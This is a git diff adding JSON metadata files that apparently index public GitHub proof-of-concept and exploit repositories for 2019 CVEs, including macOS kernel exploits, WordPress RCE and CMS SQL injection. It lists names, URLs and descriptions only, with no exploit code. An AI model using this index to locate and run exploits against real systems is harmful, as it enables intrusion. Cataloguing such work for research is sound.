newline at end of file diff --git a/2019/CVE-2019-8540.json b/2019/CVE-2019-8540.json new file mode 100644 index 0000000000..8d71a8422e --- /dev/null +++ b/2019/CVE-2019-8540.json @@ -0,0 +1,33 @@ +[ + { + "id": 187144564, + "name": "CVE-2019-8540", + "full_name": "maldiohead\/CVE-2019-8540", + "owner": { + "login": "maldiohead", + "id": 23315692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23315692?v=4", + "html_url": "https:\/\/github.com\/maldiohead", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maldiohead\/CVE-2019-8540", + "description": "Kernel Stack info leak at exportObjectToClient function", + "fork": false, + "created_at": "2019-05-17T04:07:14Z", + "updated_at": "2024-08-12T19:48:59Z", + "pushed_at": "2019-05-21T08:32:39Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 41, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8561.json b/2019/CVE-2019-8561.json new file mode 100644 index 0000000000..6be571a758 --- /dev/null +++ b/2019/CVE-2019-8561.json @@ -0,0 +1,38 @@ +[ + { + "id": 190824936, + "name": "CVE-2019-8561", + "full_name": "0xmachos\/CVE-2019-8561", + "owner": { + "login": "0xmachos", + "id": 30755149, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30755149?v=4", + "html_url": "https:\/\/github.com\/0xmachos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xmachos\/CVE-2019-8561", + "description": "Proof of concept exploit for CVE-2019-8561 discovered by @jbradley89 ", + "fork": false, + "created_at": "2019-06-07T23:48:55Z", + "updated_at": "2022-11-15T11:36:12Z", + "pushed_at": "2021-04-30T13:45:50Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "macos", + "poc", + "proof-of-concept" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8591.json b/2019/CVE-2019-8591.json new file mode 100644 index 0000000000..4904acf310 --- /dev/null +++ b/2019/CVE-2019-8591.json @@ -0,0 +1,33 @@ +[ + { + "id": 234989434, + "name": "used_sock", + "full_name": "jsherman212\/used_sock", + "owner": { + "login": "jsherman212", + "id": 42921048, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42921048?v=4", + "html_url": "https:\/\/github.com\/jsherman212", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jsherman212\/used_sock", + "description": "tfp0 based on CVE-2019-8591\/CVE-2019-8605", + "fork": false, + "created_at": "2020-01-20T00:33:37Z", + "updated_at": "2022-08-25T17:49:05Z", + "pushed_at": "2020-02-06T14:25:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8601.json b/2019/CVE-2019-8601.json new file mode 100644 index 0000000000..dc5054cdf7 --- /dev/null +++ b/2019/CVE-2019-8601.json @@ -0,0 +1,33 @@ +[ + { + "id": 231278850, + "name": "CVE-2019-8601", + "full_name": "BadAccess11\/CVE-2019-8601", + "owner": { + "login": "BadAccess11", + "id": 59069469, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59069469?v=4", + "html_url": "https:\/\/github.com\/BadAccess11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BadAccess11\/CVE-2019-8601", + "description": "Exploiting a patched vulnerability in JavaScriptCore", + "fork": false, + "created_at": "2020-01-02T00:12:22Z", + "updated_at": "2023-09-01T00:28:44Z", + "pushed_at": "2020-01-02T00:13:22Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8605.json b/2019/CVE-2019-8605.json new file mode 100644 index 0000000000..42efe312ef --- /dev/null +++ b/2019/CVE-2019-8605.json @@ -0,0 +1,33 @@ +[ + { + "id": 329825173, + "name": "CVE-2019-8605", + "full_name": "1nteger-c\/CVE-2019-8605", + "owner": { + "login": "1nteger-c", + "id": 51286442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51286442?v=4", + "html_url": "https:\/\/github.com\/1nteger-c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1nteger-c\/CVE-2019-8605", + "description": null, + "fork": false, + "created_at": "2021-01-15T06:12:14Z", + "updated_at": "2021-06-21T07:02:35Z", + "pushed_at": "2021-06-21T07:02:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8627.json b/2019/CVE-2019-8627.json new file mode 100644 index 0000000000..b91c2e0947 --- /dev/null +++ b/2019/CVE-2019-8627.json @@ -0,0 +1,33 @@ +[ + { + "id": 187134540, + "name": "CVE-2019-8627", + "full_name": "maldiohead\/CVE-2019-8627", + "owner": { + "login": "maldiohead", + "id": 23315692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23315692?v=4", + "html_url": "https:\/\/github.com\/maldiohead", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maldiohead\/CVE-2019-8627", + "description": "a kernel information leak on macOS<= 10.14.4", + "fork": false, + "created_at": "2019-05-17T02:40:39Z", + "updated_at": "2023-03-29T14:50:44Z", + "pushed_at": "2019-05-24T08:44:05Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8641.json b/2019/CVE-2019-8641.json new file mode 100644 index 0000000000..d52fcffdc3 --- /dev/null +++ b/2019/CVE-2019-8641.json @@ -0,0 +1,33 @@ +[ + { + "id": 267795979, + "name": "CVE-2019-8641-reproduction", + "full_name": "chia33164\/CVE-2019-8641-reproduction", + "owner": { + "login": "chia33164", + "id": 26138915, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26138915?v=4", + "html_url": "https:\/\/github.com\/chia33164", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chia33164\/CVE-2019-8641-reproduction", + "description": "The reproduction code for CVE-2019-8641.", + "fork": false, + "created_at": "2020-05-29T07:37:15Z", + "updated_at": "2024-01-04T05:50:21Z", + "pushed_at": "2020-05-27T08:58:38Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8656.json b/2019/CVE-2019-8656.json new file mode 100644 index 0000000000..95766e0bde --- /dev/null +++ b/2019/CVE-2019-8656.json @@ -0,0 +1,33 @@ +[ + { + "id": 265966449, + "name": "CVE-2019-8656", + "full_name": "D00MFist\/CVE-2019-8656", + "owner": { + "login": "D00MFist", + "id": 17372992, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17372992?v=4", + "html_url": "https:\/\/github.com\/D00MFist", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D00MFist\/CVE-2019-8656", + "description": "CVE-2019-8656 GateKeeper Bypass", + "fork": false, + "created_at": "2020-05-21T22:41:59Z", + "updated_at": "2024-08-12T20:01:44Z", + "pushed_at": "2020-05-22T14:12:51Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8781.json b/2019/CVE-2019-8781.json new file mode 100644 index 0000000000..f95956d41c --- /dev/null +++ b/2019/CVE-2019-8781.json @@ -0,0 +1,68 @@ +[ + { + "id": 209122833, + "name": "macOS-Kernel-Exploit", + "full_name": "A2nkF\/macOS-Kernel-Exploit", + "owner": { + "login": "A2nkF", + "id": 30269068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30269068?v=4", + "html_url": "https:\/\/github.com\/A2nkF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/A2nkF\/macOS-Kernel-Exploit", + "description": "macOS Kernel Exploit for CVE-2019-8781. ", + "fork": false, + "created_at": "2019-09-17T17:59:26Z", + "updated_at": "2024-08-12T19:53:06Z", + "pushed_at": "2019-10-15T17:05:38Z", + "stargazers_count": 292, + "watchers_count": 292, + "has_discussions": false, + "forks_count": 43, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "kernel-exploit", + "macos" + ], + "visibility": "public", + "forks": 43, + "watchers": 292, + "score": 0, + "subscribers_count": 16 + }, + { + "id": 217838487, + "name": "CVE-2019-8781-macOS", + "full_name": "TrungNguyen1909\/CVE-2019-8781-macOS", + "owner": { + "login": "TrungNguyen1909", + "id": 22745058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22745058?v=4", + "html_url": "https:\/\/github.com\/TrungNguyen1909", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TrungNguyen1909\/CVE-2019-8781-macOS", + "description": "Exploit POC for the bug CVE-2019-8781, found by @LinusHenze", + "fork": false, + "created_at": "2019-10-27T10:28:35Z", + "updated_at": "2021-11-04T08:31:32Z", + "pushed_at": "2019-10-27T10:30:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8791.json b/2019/CVE-2019-8791.json new file mode 100644 index 0000000000..f0814d40f9 --- /dev/null +++ b/2019/CVE-2019-8791.json @@ -0,0 +1,33 @@ +[ + { + "id": 330462825, + "name": "Shazam-CVE-2019-8791-CVE-2019-8792", + "full_name": "ashleykinguk\/Shazam-CVE-2019-8791-CVE-2019-8792", + "owner": { + "login": "ashleykinguk", + "id": 19891472, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19891472?v=4", + "html_url": "https:\/\/github.com\/ashleykinguk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ashleykinguk\/Shazam-CVE-2019-8791-CVE-2019-8792", + "description": "PoC for CVE-2019-8791 & CVE-2019-8792", + "fork": false, + "created_at": "2021-01-17T18:49:54Z", + "updated_at": "2021-02-08T20:54:29Z", + "pushed_at": "2021-01-17T18:53:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8805.json b/2019/CVE-2019-8805.json new file mode 100644 index 0000000000..fb58fde209 --- /dev/null +++ b/2019/CVE-2019-8805.json @@ -0,0 +1,33 @@ +[ + { + "id": 816731747, + "name": "CVE-2019-8805", + "full_name": "securelayer7\/CVE-2019-8805", + "owner": { + "login": "securelayer7", + "id": 14994455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14994455?v=4", + "html_url": "https:\/\/github.com\/securelayer7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securelayer7\/CVE-2019-8805", + "description": "Exploit for CVE-2019-8805 Apple EndpointSecurity framework Privilege Escalation", + "fork": false, + "created_at": "2024-06-18T09:49:03Z", + "updated_at": "2024-08-21T17:39:42Z", + "pushed_at": "2024-07-12T05:14:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8852.json b/2019/CVE-2019-8852.json new file mode 100644 index 0000000000..a1f5b4f219 --- /dev/null +++ b/2019/CVE-2019-8852.json @@ -0,0 +1,33 @@ +[ + { + "id": 353334675, + "name": "CVE-2019-8852", + "full_name": "pattern-f\/CVE-2019-8852", + "owner": { + "login": "pattern-f", + "id": 48882723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48882723?v=4", + "html_url": "https:\/\/github.com\/pattern-f", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pattern-f\/CVE-2019-8852", + "description": "PoC demo for CVE-2019-8852, a tfp0 bug.", + "fork": false, + "created_at": "2021-03-31T11:36:47Z", + "updated_at": "2022-11-09T18:11:45Z", + "pushed_at": "2021-05-06T03:04:33Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8936.json b/2019/CVE-2019-8936.json new file mode 100644 index 0000000000..13d55311a4 --- /dev/null +++ b/2019/CVE-2019-8936.json @@ -0,0 +1,33 @@ +[ + { + "id": 259009327, + "name": "CVE-2019-8936", + "full_name": "snappyJack\/CVE-2019-8936", + "owner": { + "login": "snappyJack", + "id": 16055573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16055573?v=4", + "html_url": "https:\/\/github.com\/snappyJack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/snappyJack\/CVE-2019-8936", + "description": null, + "fork": false, + "created_at": "2020-04-26T11:07:19Z", + "updated_at": "2020-04-26T11:21:31Z", + "pushed_at": "2020-04-26T11:21:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8942.json b/2019/CVE-2019-8942.json new file mode 100644 index 0000000000..aee8e00dee --- /dev/null +++ b/2019/CVE-2019-8942.json @@ -0,0 +1,129 @@ +[ + { + "id": 172448763, + "name": "WordPress_4.9.8_RCE_POC", + "full_name": "brianwrf\/WordPress_4.9.8_RCE_POC", + "owner": { + "login": "brianwrf", + "id": 8141813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8141813?v=4", + "html_url": "https:\/\/github.com\/brianwrf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brianwrf\/WordPress_4.9.8_RCE_POC", + "description": "A simple PoC for WordPress RCE (author priviledge), refer to CVE-2019-8942 and CVE-2019-8943.", + "fork": false, + "created_at": "2019-02-25T06:38:15Z", + "updated_at": "2024-08-12T19:46:08Z", + "pushed_at": "2019-03-18T01:20:52Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-8942", + "cve-2019-8943" + ], + "visibility": "public", + "forks": 21, + "watchers": 74, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 184548123, + "name": "CVE-2019-8942", + "full_name": "synacktiv\/CVE-2019-8942", + "owner": { + "login": "synacktiv", + "id": 50145679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4", + "html_url": "https:\/\/github.com\/synacktiv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/synacktiv\/CVE-2019-8942", + "description": "WordPress crop-image exploitation", + "fork": false, + "created_at": "2019-05-02T08:41:11Z", + "updated_at": "2024-08-12T19:48:30Z", + "pushed_at": "2019-05-02T08:42:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 364638510, + "name": "WP_CROP_RCE", + "full_name": "synod2\/WP_CROP_RCE", + "owner": { + "login": "synod2", + "id": 9367196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9367196?v=4", + "html_url": "https:\/\/github.com\/synod2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/synod2\/WP_CROP_RCE", + "description": "cve-2019-8942, cve-2019-8943", + "fork": false, + "created_at": "2021-05-05T16:23:03Z", + "updated_at": "2021-05-05T17:01:38Z", + "pushed_at": "2021-05-05T17:01:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 498173034, + "name": "CVE-2019-8942", + "full_name": "tuannq2299\/CVE-2019-8942", + "owner": { + "login": "tuannq2299", + "id": 66456080, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66456080?v=4", + "html_url": "https:\/\/github.com\/tuannq2299", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tuannq2299\/CVE-2019-8942", + "description": null, + "fork": false, + "created_at": "2022-05-31T03:28:22Z", + "updated_at": "2023-11-08T12:38:06Z", + "pushed_at": "2022-05-31T03:35:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8943.json b/2019/CVE-2019-8943.json new file mode 100644 index 0000000000..bbab214e89 --- /dev/null +++ b/2019/CVE-2019-8943.json @@ -0,0 +1,64 @@ +[ + { + "id": 334947839, + "name": "CVE-2019-8943", + "full_name": "v0lck3r\/CVE-2019-8943", + "owner": { + "login": "v0lck3r", + "id": 61425261, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61425261?v=4", + "html_url": "https:\/\/github.com\/v0lck3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/v0lck3r\/CVE-2019-8943", + "description": "Exploit of CVE-2019-8942 and CVE-2019-8943 ", + "fork": false, + "created_at": "2021-02-01T12:47:28Z", + "updated_at": "2024-11-07T20:43:30Z", + "pushed_at": "2021-02-02T15:46:22Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 539045907, + "name": "wordpress_cropimage", + "full_name": "hadrian3689\/wordpress_cropimage", + "owner": { + "login": "hadrian3689", + "id": 71423134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hadrian3689\/wordpress_cropimage", + "description": "CVE-2019-8943 WordPress Crop-Image", + "fork": false, + "created_at": "2022-09-20T14:56:00Z", + "updated_at": "2024-02-29T15:19:57Z", + "pushed_at": "2022-09-20T15:12:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8956.json b/2019/CVE-2019-8956.json new file mode 100644 index 0000000000..a8b827d173 --- /dev/null +++ b/2019/CVE-2019-8956.json @@ -0,0 +1,33 @@ +[ + { + "id": 188973928, + "name": "CVE-2019-8956", + "full_name": "butterflyhack\/CVE-2019-8956", + "owner": { + "login": "butterflyhack", + "id": 11525772, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11525772?v=4", + "html_url": "https:\/\/github.com\/butterflyhack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/butterflyhack\/CVE-2019-8956", + "description": "sctp-PoC", + "fork": false, + "created_at": "2019-05-28T07:09:17Z", + "updated_at": "2022-11-09T04:06:46Z", + "pushed_at": "2019-05-28T07:15:56Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8978.json b/2019/CVE-2019-8978.json new file mode 100644 index 0000000000..e187f07289 --- /dev/null +++ b/2019/CVE-2019-8978.json @@ -0,0 +1,33 @@ +[ + { + "id": 186045784, + "name": "CVE-2019-8978", + "full_name": "SecKatie\/CVE-2019-8978", + "owner": { + "login": "SecKatie", + "id": 36283247, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36283247?v=4", + "html_url": "https:\/\/github.com\/SecKatie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecKatie\/CVE-2019-8978", + "description": "Banner Web Tailor and Banner Enterprise Identity Services Vulnerability Disclosure", + "fork": false, + "created_at": "2019-05-10T19:46:58Z", + "updated_at": "2019-12-16T20:26:11Z", + "pushed_at": "2019-12-16T20:26:09Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8979.json b/2019/CVE-2019-8979.json new file mode 100644 index 0000000000..3f88ef8004 --- /dev/null +++ b/2019/CVE-2019-8979.json @@ -0,0 +1,33 @@ +[ + { + "id": 309222076, + "name": "ko7demo", + "full_name": "elttam\/ko7demo", + "owner": { + "login": "elttam", + "id": 17078044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17078044?v=4", + "html_url": "https:\/\/github.com\/elttam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/elttam\/ko7demo", + "description": "A docker-contained koseven hello world to play with SQL injection CVE-2019-8979 affecting versions < 3.3.10", + "fork": false, + "created_at": "2020-11-02T00:58:12Z", + "updated_at": "2021-06-14T07:56:04Z", + "pushed_at": "2020-10-12T20:16:05Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8985.json b/2019/CVE-2019-8985.json new file mode 100644 index 0000000000..cac9f64410 --- /dev/null +++ b/2019/CVE-2019-8985.json @@ -0,0 +1,33 @@ +[ + { + "id": 515597357, + "name": "CVE-2019-8985", + "full_name": "Squirre17\/CVE-2019-8985", + "owner": { + "login": "Squirre17", + "id": 79578430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79578430?v=4", + "html_url": "https:\/\/github.com\/Squirre17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Squirre17\/CVE-2019-8985", + "description": "CVE–2019–8985 Netis WF2411 RCE", + "fork": false, + "created_at": "2022-07-19T13:30:07Z", + "updated_at": "2023-07-04T08:47:33Z", + "pushed_at": "2022-07-19T15:21:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8997.json b/2019/CVE-2019-8997.json new file mode 100644 index 0000000000..e252eb153f --- /dev/null +++ b/2019/CVE-2019-8997.json @@ -0,0 +1,33 @@ +[ + { + "id": 181992295, + "name": "CVE-2019-8997", + "full_name": "nxkennedy\/CVE-2019-8997", + "owner": { + "login": "nxkennedy", + "id": 14210025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14210025?v=4", + "html_url": "https:\/\/github.com\/nxkennedy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nxkennedy\/CVE-2019-8997", + "description": "An XML External Entity Injection (XXE) vulnerability in the Management System (console) of BlackBerry AtHoc versions earlier than 7.6 HF-567 could allow an attacker to potentially read arbitrary local files from the application server or make requests on the network by entering maliciously crafted XML in an existing field.", + "fork": false, + "created_at": "2019-04-18T01:09:02Z", + "updated_at": "2020-12-07T11:59:27Z", + "pushed_at": "2020-02-04T17:54:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-905.json b/2019/CVE-2019-905.json new file mode 100644 index 0000000000..531904f220 --- /dev/null +++ b/2019/CVE-2019-905.json @@ -0,0 +1,33 @@ +[ + { + "id": 488526250, + "name": "CMS-made-simple-sqli-python3", + "full_name": "xtafnull\/CMS-made-simple-sqli-python3", + "owner": { + "login": "xtafnull", + "id": 104629209, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104629209?v=4", + "html_url": "https:\/\/github.com\/xtafnull", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xtafnull\/CMS-made-simple-sqli-python3", + "description": " CMS Made Simple < 2.2.10 - SQL Injection (rewritten for python3), CVE-2019-905", + "fork": false, + "created_at": "2022-05-04T09:26:45Z", + "updated_at": "2022-05-04T09:31:26Z", + "pushed_at": "2022-05-04T09:32:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-9053.json b/2019/CVE-2019-9053.json new file mode 100644 index 0000000000..f559ee65f2 --- /dev/null +++ b/2019/CVE-2019-9053.json @@ -0,0 +1,725 @@ +[ + { + "id": 367243970, + "name": "46635.py_CVE-2019-9053", + "full_name": "SUNNYSAINI01001\/46635.py_CVE-2019-9053", + "owner": { + "login": "SUNNYSAINI01001", + "id": 75130938, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75130938?v=4", + "html_url": "https:\/\/github.com\/SUNNYSAINI01001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SUNNYSAINI01001\/46635.py_CVE-2019-9053", + "description": "This is modified code of 46635 exploit from python2 to python3.", + "fork": false, + "created_at": "2021-05-14T03:59:53Z", + "updated_at": "2024-01-03T18:08:06Z", + "pushed_at": "2021-05-14T04:03:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 387264720, + "name": "CVE-2019-9053", + "full_name": "n3rdh4x0r\/CVE-2019-9053", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2019-9053", + "description": null, + "fork": false, + "created_at": "2021-07-18T20:37:30Z", + "updated_at": "2024-11-18T18:53:03Z", + "pushed_at": "2024-11-18T18:53:00Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 436706794, + "name": "46635.py", + "full_name": "maraspiras\/46635.py", + "owner": { + "login": "maraspiras", + "id": 13720244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13720244?v=4", + "html_url": "https:\/\/github.com\/maraspiras", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maraspiras\/46635.py", + "description": "update to Daniele Scanu's SQL Injection Exploit - CVE-2019-9053", + "fork": false, + "created_at": "2021-12-09T17:39:15Z", + "updated_at": "2021-12-09T17:49:46Z", + "pushed_at": "2021-12-09T17:49:43Z", + "stargazers_count": 0, + "watchers_count": 0, + 